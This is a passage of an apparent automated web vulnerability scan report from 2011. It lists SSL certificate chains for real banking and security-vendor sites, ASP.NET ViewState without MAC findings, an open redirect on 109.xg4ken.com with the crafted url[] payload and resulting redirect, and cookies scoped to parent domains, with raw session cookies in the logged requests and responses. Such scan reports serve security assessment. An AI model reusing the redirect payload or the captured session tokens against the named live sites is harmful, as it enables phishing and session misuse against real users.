Issued to:  COMODO Extended Validation Secure Server CA
Issued by:  COMODO Certification Authority
Valid from:  Sun May 23 19:00:00 CDT 2010
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:  COMODO Certification Authority
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #3

Issued to:  AddTrust External CA Root
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020

11.15. https://secure.comodo.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.comodo.net
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  secure.comodo.net
Issued by:  COMODO High-Assurance Secure Server CA
Valid from:  Mon Jun 21 19:00:00 CDT 2010
Valid to:  Wed Jul 29 18:59:59 CDT 2015

Certificate chain #1

Issued to:  COMODO High-Assurance Secure Server CA
Issued by:  AddTrust External CA Root
Valid from:  Thu Apr 15 19:00:00 CDT 2010
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:  AddTrust External CA Root
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020

11.16. https://secure.eloqua.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.eloqua.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  secure.eloqua.com
Issued by:  VeriSign Class 3 Extended Validation SSL CA
Valid from:  Tue Dec 15 18:00:00 CST 2009
Valid to:  Tue Feb 14 17:59:59 CST 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

11.17. https://shots-s.snap.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://shots-s.snap.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  shots-s.snap.com
Issued by:  UTN-USERFirst-Hardware
Valid from:  Tue Oct 19 19:00:00 CDT 2010
Valid to:  Tue Nov 01 18:59:59 CDT 2011

Certificate chain #1

Issued to:  UTN-USERFirst-Hardware
Issued by:  UTN-USERFirst-Hardware
Valid from:  Fri Jul 09 13:10:42 CDT 1999
Valid to:  Tue Jul 09 13:19:22 CDT 2019

11.18. https://support.sentrigo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.sentrigo.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.sentrigo.com
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Sun Apr 05 05:42:02 CDT 2009
Valid to:  Mon Jun 06 06:38:09 CDT 2011

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 CST 2006
Valid to:  Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  http://www.valicert.com/
Valid from:  Tue Jun 29 12:06:20 CDT 2004
Valid to:  Sat Jun 29 12:06:20 CDT 2024

Certificate chain #3

Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 19:19:54 CDT 1999
Valid to:  Tue Jun 25 19:19:54 CDT 2019

11.19. https://tc.bankofamerica.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://tc.bankofamerica.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  tc.bankofamerica.com
Issued by:  VeriSign Class 3 Secure Server CA - G3
Valid from:  Thu Feb 17 18:00:00 CST 2011
Valid to:  Mon Mar 12 18:59:59 CDT 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Wed Jul 16 18:59:59 CDT 2036

11.20. https://www.bankofamerica.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.bankofamerica.com
Issued by:  VeriSign Class 3 Extended Validation SSL CA
Valid from:  Thu Feb 03 18:00:00 CST 2011
Valid to:  Tue Mar 06 17:59:59 CST 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Tue Aug 01 18:59:59 CDT 2028

Certificate chain #4

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

11.21. https://www.fs.ustrust.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.fs.ustrust.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.fs.ustrust.com
Issued by:  VeriSign Class 3 Secure Server CA - G3
Valid from:  Mon Jan 17 18:00:00 CST 2011
Valid to:  Wed Jan 18 17:59:59 CST 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Tue Aug 01 18:59:59 CDT 2028

Certificate chain #4

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

11.22. https://www.mavitunasecurity.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.mavitunasecurity.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.mavitunasecurity.com
Issued by:  Starfield Secure Certification Authority
Valid from:  Sat Aug 21 10:02:55 CDT 2010
Valid to:  Sun Aug 26 05:09:38 CDT 2012

Certificate chain #1

Issued to:  Starfield Secure Certification Authority
Issued by:  Starfield Class 2 Certification Authority
Valid from:  Wed Nov 15 19:15:40 CST 2006
Valid to:  Sun Nov 15 19:15:40 CST 2026

Certificate chain #2

Issued to:  Starfield Class 2 Certification Authority
Issued by:  Starfield Class 2 Certification Authority
Valid from:  Tue Jun 29 12:39:16 CDT 2004
Valid to:  Thu Jun 29 12:39:16 CDT 2034

11.23. https://www.merrilledge.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.merrilledge.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.merrilledge.com
Issued by:  VeriSign Class 3 Secure Server CA - G2
Valid from:  Thu May 13 19:00:00 CDT 2010
Valid to:  Sat May 14 18:59:59 CDT 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G2
Issued by:  VeriSign Trust Network
Valid from:  Tue Mar 24 19:00:00 CDT 2009
Valid to:  Sun Mar 24 18:59:59 CDT 2019

Certificate chain #2

Issued to:  VeriSign Trust Network
Issued by:  VeriSign Trust Network
Valid from:  Sun May 17 19:00:00 CDT 1998
Valid to:  Tue Aug 01 18:59:59 CDT 2028

11.24. https://www.mysecureconnect.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.mysecureconnect.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.mysecureconnect.com
Issued by:  GeoTrust DV SSL CA
Valid from:  Fri Nov 12 20:09:34 CST 2010
Valid to:  Thu Dec 15 19:12:37 CST 2011

Certificate chain #1

Issued to:  GeoTrust DV SSL CA
Issued by:  GeoTrust Global CA
Valid from:  Fri Feb 26 15:32:31 CST 2010
Valid to:  Tue Feb 25 15:32:31 CST 2020

Certificate chain #2

Issued to:  GeoTrust Global CA
Issued by:  GeoTrust Global CA
Valid from:  Mon May 20 23:00:00 CDT 2002
Valid to:  Fri May 20 23:00:00 CDT 2022

11.25. https://www.saintcorporation.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.saintcorporation.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.saintcorporation.com
Issued by:  Network Solutions Certificate Authority
Valid from:  Wed Apr 06 19:00:00 CDT 2011
Valid to:  Thu Apr 24 18:59:59 CDT 2014

Certificate chain #1

Issued to:  Network Solutions Certificate Authority
Issued by:  UTN-USERFirst-Hardware
Valid from:  Sun Apr 09 19:00:00 CDT 2006
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:  UTN-USERFirst-Hardware
Issued by:  AddTrust External CA Root
Valid from:  Tue Jun 07 03:09:10 CDT 2005
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #3

Issued to:  AddTrust External CA Root
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #4

Issued to:  AddTrust External CA Root
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020

12. ASP.NET ViewState without MAC enabled  previous  next
There are 3 instances of this issue:


12.1. http://www.merrilledge.com/m/pages/global-oao.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.merrilledge.com
Path:   /m/pages/global-oao.aspx

Request

GET /m/pages/global-oao.aspx HTTP/1.1
Host: www.merrilledge.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SMIDENTITY=0W34VN9dA9bWGxNH7Zo+wNB4BqhgfwgC/V3SS6QoRVIhpR3iFFqiPEtEy5Vg60B4eA74F0BCLpV6OvE72yrh6+55CW/ai7RnuZGDEpHwvqDe8sRPkCBbEb0l/YGIxk6PrZhVLIoYebn0XY3xMclg+G08+dUO8bhtR0OiIYjoM0++rS7ZOJ/UaaFpw0KtXh6K+2AU8+inyYPyOlBsNy2LbHjpwP50nhqcqqBAIUQ/OhxApBnqmCLnCTSes9vjk4hHDVrhjbXDoPLoISGQqisUzc6TBefD5Q9m4GnifxAiXCyr2xfWKeoDmM//AH+0MV7lybo5N/sihQV4ohsXxYN1J8PCK7RVgHPvhsxGkbmcXf/fRxt0k0zaGW7H8xTY7bFLulvcm1wXA8II0K3qcgsXox5uljKP60/lrQ/iD+Y+VOJAN4phstGAi5uH1rku+/Jz4DeUUSYO3fBMcYMUCguwWF6Tpm5rWb9ogQfkSWUlXd1PKvu/YtQcdoj/0yQueC7l6fbkCSjrjU+TBskdUgQaLWGR6v9BYYwx6I+r6kEdusGSd0Toh8QeOVM8QmpAfl/vpcow5jjnqSi4WCWrtMkZOqeiDWBEhbMZ5EVgOoJJiV0xNFM9qwN4bJ8PgOrbFotT; pxs=53e1d1d2ef5543dabbbb6e0d12a34f8b; pxv=C22A32BD-4241-4EE4-951A-6B07D6D8E16E

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:28:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 89473


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTYzNTQzMDQ3NWRk" />
...[SNIP]...

12.2. https://www.merrilledge.com/m/pages/global-oao.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.merrilledge.com
Path:   /m/pages/global-oao.aspx

Request

GET /m/pages/global-oao.aspx HTTP/1.1
Host: www.merrilledge.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SMIDENTITY=0W34VN9dA9bWGxNH7Zo+wNB4BqhgfwgC/V3SS6QoRVIhpR3iFFqiPEtEy5Vg60B4eA74F0BCLpV6OvE72yrh6+55CW/ai7RnuZGDEpHwvqDe8sRPkCBbEb0l/YGIxk6PrZhVLIoYebn0XY3xMclg+G08+dUO8bhtR0OiIYjoM0++rS7ZOJ/UaaFpw0KtXh6K+2AU8+inyYPyOlBsNy2LbHjpwP50nhqcqqBAIUQ/OhxApBnqmCLnCTSes9vjk4hHDVrhjbXDoPLoISGQqisUzc6TBefD5Q9m4GnifxAiXCyr2xfWKeoDmM//AH+0MV7lybo5N/sihQV4ohsXxYN1J8PCK7RVgHPvhsxGkbmcXf/fRxt0k0zaGW7H8xTY7bFLulvcm1wXA8II0K3qcgsXox5uljKP60/lrQ/iD+Y+VOJAN4phstGAi5uH1rku+/Jz4DeUUSYO3fBMcYMUCguwWF6Tpm5rWb9ogQfkSWUlXd1PKvu/YtQcdoj/0yQueC7l6fbkCSjrjU+TBskdUgQaLWGR6v9BYYwx6I+r6kEdusGSd0Toh8QeOVM8QmpAfl/vpcow5jjnqSi4WCWrtMkZOqeiDWBEhbMZ5EVgOoJJiV0xNFM9qwN4bJ8PgOrbFotT; pxs=53e1d1d2ef5543dabbbb6e0d12a34f8b; pxv=C22A32BD-4241-4EE4-951A-6B07D6D8E16E

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 26 Apr 2011 12:28:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.merrilledge.com/m/pages/global-oao.aspx
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 89478


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTYzNTQzMDQ3NWRk" />
...[SNIP]...

12.3. https://www.merrilledge.com/m/pages/home.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.merrilledge.com
Path:   /m/pages/home.aspx

Request

GET /m/pages/home.aspx HTTP/1.1
Host: www.merrilledge.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:27:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=jLP3XoAxGsv1v6MwPZhahlP/aoO3xH/srhMcrJj795J+eDNFXiPfjzck1kD4CBi+6ie4KrwamlTHaXTZUdECRzrFky9gNvwqK2gfsTdEDm7sAur5XVP4PPYin3ZpmEGZhp4U9tI/R2PBhf10C0GUszchafmuD9bl4ok1Tou4xpWvp8+gJofMVxln5UHKDCa81PkeNNVr9tnGgUbb8xfUqJ9mQ+4UmQUBAvTOqlILImkN5L5gXWD34cRgwFSZ2KnJ3H2WELiFxhYRFU/W8/5hb7Ab0vdhSiKgU1mzlw6G++AaFuJs+7z65oKRdeBCqK0hIz3tim19s96RERtkf9rfjHj+6RDI79fjrabVGOlnraDPyBxJbqaBTLfWCRw+ylCtGUKvwL6+os3qLez4GsDok2Qd+n4qvsQdjjUilaWTMSP27nak6lbRwCk4b/M4No0d4wzcrSvMyENoATzMp8aftIfSjmRgRvGUNASAKrTSpR5rfw6e36o6v3gAJa9Ivvp8bVC7cNorr2VzTikkqJI1i1lWvbV9SNzGVXk61fudxdZpjJjPAMIp9cah6rKP6ckESa6k8l1TR7oiXNRlH9EEi7eiYAWvwxgHlp0pcxiP0RMD9/1rRGHkXk3lzz8V7861; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Set-Cookie: pxs=341ce30bc7594740a1c8d88f714e0605; domain=.merrilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 107200


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTU5ODkwMTk0M2Rk" />
...[SNIP]...

13. Open redirection  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://109.xg4ken.com
Path:   /media/redir.php

Issue detail

The value of the url[] request parameter is used to perform an HTTP redirect. The payload http%3a//afa5caf6e671e492f/a%3fhttp%3a//servedby.flashtalking.com/click/16008%3b128708%3b94221%3b230%3b3/%3furl%3dhttp%3a//response.firstdata.com/%3felqPURLPage%3d15 was submitted in the url[] parameter. This caused a redirection to the following URL:

Request

GET /media/redir.php?prof=56&camp=3086&affcode=kw134&cid=10327990298&networkType=search&url[]=http%3a//afa5caf6e671e492f/a%3fhttp%3a//servedby.flashtalking.com/click/16008%3b128708%3b94221%3b230%3b3/%3furl%3dhttp%3a//response.firstdata.com/%3felqPURLPage%3d15 HTTP/1.1
Host: 109.xg4ken.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 25 Apr 2011 23:44:08 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=5a9eb212-05ba-a349-c2e9-00005b81cb95; expires=Sun, 24-Jul-2011 23:44:08 GMT; path=/; domain=.xg4ken.com
Location: http://afa5caf6e671e492f/a?http://servedby.flashtalking.com/click/16008;128708;94221;230;3/?url=http://response.firstdata.com/?elqPURLPage=15
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


14. Cookie scoped to parent domain  previous  next
There are 76 instances of this issue:


14.1. http://assets.trialpay.com/tr/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://assets.trialpay.com
Path:   /tr/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tr/?u=%2Fabout%2Fpress-releases%2F%3Fyear%3D2007 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: assets.trialpay.com

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 14:25:25 GMT
Server: Apache
Set-Cookie: tpsess=fvvvvvulqmr4r26j1pkontns7l3001c880969669; expires=Sun, 24-Apr-2016 14:25:25 GMT; path=/; domain=.trialpay.com
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: si=Iitt8Ait; expires=Sun, 24-Apr-2016 14:25:25 GMT; path=/; domain=.trialpay.com
Set-Cookie: sk=7fef1580a3c331af; expires=Sun, 24-Apr-2016 14:25:25 GMT; path=/; domain=.trialpay.com
Set-Cookie: u_ui=deleted; expires=Mon, 26-Apr-2010 14:25:24 GMT; path=/; domain=.trialpay.com
Set-Cookie: u_ui=deleted; expires=Mon, 26-Apr-2010 14:25:24 GMT; path=/; domain=merchant.trialpay.com
Set-Cookie: u_uk=deleted; expires=Mon, 26-Apr-2010 14:25:24 GMT; path=/; domain=.trialpay.com
Set-Cookie: u_uk=deleted; expires=Mon, 26-Apr-2010 14:25:24 GMT; path=/; domain=merchant.trialpay.com
Set-Cookie: u_ul=deleted; expires=Mon, 26-Apr-2010 14:25:24 GMT; path=/; domain=.trialpay.com
Set-Cookie: u_ul=deleted; expires=Mon, 26-Apr-2010 14:25:24 GMT; path=/; domain=merchant.trialpay.com
Set-Cookie: u_sr=deleted; expires=Mon, 26-Apr-2010 14:25:24 GMT; path=/; domain=.trialpay.com
Set-Cookie: u_sr=deleted; expires=Mon, 26-Apr-2010 14:25:24 GMT; path=/; domain=merchant.trialpay.com
Content-Type: text/html
Content-Length: 0


14.2. http://shots.snap.com/rk.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://shots.snap.com
Path:   /rk.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rk.php?url=http%3A%2F%2Fwww.mcafee.com%2Fus%2Fresources%2Fsolution-briefs%2Fsb-lizamoon-sql-injection.pdf&key=6e8afd4f63cdc7886a3f718aa78c7375&lang=en-us&th=silver&src=www.slaviks-blog.com&cp=Shotsense&s=small&svc=&tag=&atext=posted&title=Musings%20on%20Database%20Security&dfs=10&call=0&uid=16266132404ce087181f51bbd2d1a9b9&vid=89fdd0457a773fb9e78a2ee3e0b8ebd3&fl=null&size=320x79 HTTP/1.1
Host: shots.snap.com
Proxy-Connection: keep-alive
Referer: http://www.slaviks-blog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:22:46 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 26 Apr 2011 01:22:46 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA"
Set-Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots%26call%3D1%26time%3D1303780966; expires=Wed, 24-Apr-2013 01:22:46 GMT; path=/; domain=.snap.com
Set-Cookie: session=id%3Dcc29bbb979ecb0e0384fa2c504658e7f%26time%3D1303780966%26created_time%3D1303780966%26destination_url%3Dhttp%253A%252F%252Fshots.snap.com%252Frk.php%253Furl%253Dhttp%25253A%25252F%25252Fwww.mcafee.com%25252Fus%25252Fresources%25252Fsolution-briefs%25252Fsb-lizamoon-sql-injection.pdf%2526key%253D6e8afd4f63cdc7886a3f718aa78c7375%2526lang%253Den-us%2526th%253Dsilver%2526src%253Dwww.slaviks-blog.com%2526cp%253DShotsense%2526s%253Dsmall%2526svc%253D%2526tag%253D%2526atext%253Dposted%2526title%253DMusings%252520on%252520Database%252520Security%2526dfs%253D10%2526call%253D0%2526uid%253D16266132404ce087181f51bbd2d1a9b9%2526vid%253D89fdd0457a773fb9e78a2ee3e0b8ebd3%2526fl%253Dnull%2526size%253D320x79%26referrer%3Dhttp%253A%252F%252Fwww.slaviks-blog.com%252F; path=/; domain=.snap.com
Set-Cookie: session=id%3Dcc29bbb979ecb0e0384fa2c504658e7f%26time%3D1303780966%26created_time%3D1303780966%26destination_url%3Dhttp%253A%252F%252Fshots.snap.com%252Frk.php%253Furl%253Dhttp%25253A%25252F%25252Fwww.mcafee.com%25252Fus%25252Fresources%25252Fsolution-briefs%25252Fsb-lizamoon-sql-injection.pdf%2526key%253D6e8afd4f63cdc7886a3f718aa78c7375%2526lang%253Den-us%2526th%253Dsilver%2526src%253Dwww.slaviks-blog.com%2526cp%253DShotsense%2526s%253Dsmall%2526svc%253D%2526tag%253D%2526atext%253Dposted%2526title%253DMusings%252520on%252520Database%252520Security%2526dfs%253D10%2526call%253D0%2526uid%253D16266132404ce087181f51bbd2d1a9b9%2526vid%253D89fdd0457a773fb9e78a2ee3e0b8ebd3%2526fl%253Dnull%2526size%253D320x79%26referrer%3Dhttp%253A%252F%252Fwww.slaviks-blog.com%252F%26call%3D1; path=/; domain=.snap.com
Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 01:22:45 GMT; path=/; domain=.snap.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 10269

<html>
<head>


<style>


body {
margin: 0;
padding: 0;
background: #f2f2f2 url('http://i.ixnp.com/images/hdr-spons.gif') no-repeat fixed 97% 94%;

border: 0;
}

#keywordTable {
fon
...[SNIP]...

14.3. http://www.clone-systems.com/ecommerce/categories/PCI-ASV-Scanning-Services/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.clone-systems.com
Path:   /ecommerce/categories/PCI-ASV-Scanning-Services/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ecommerce/categories/PCI-ASV-Scanning-Services/ HTTP/1.1
Host: www.clone-systems.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMSSESSIDe4d04fcf=rqtsjtdic4ntsneeiknvckvj63

Response

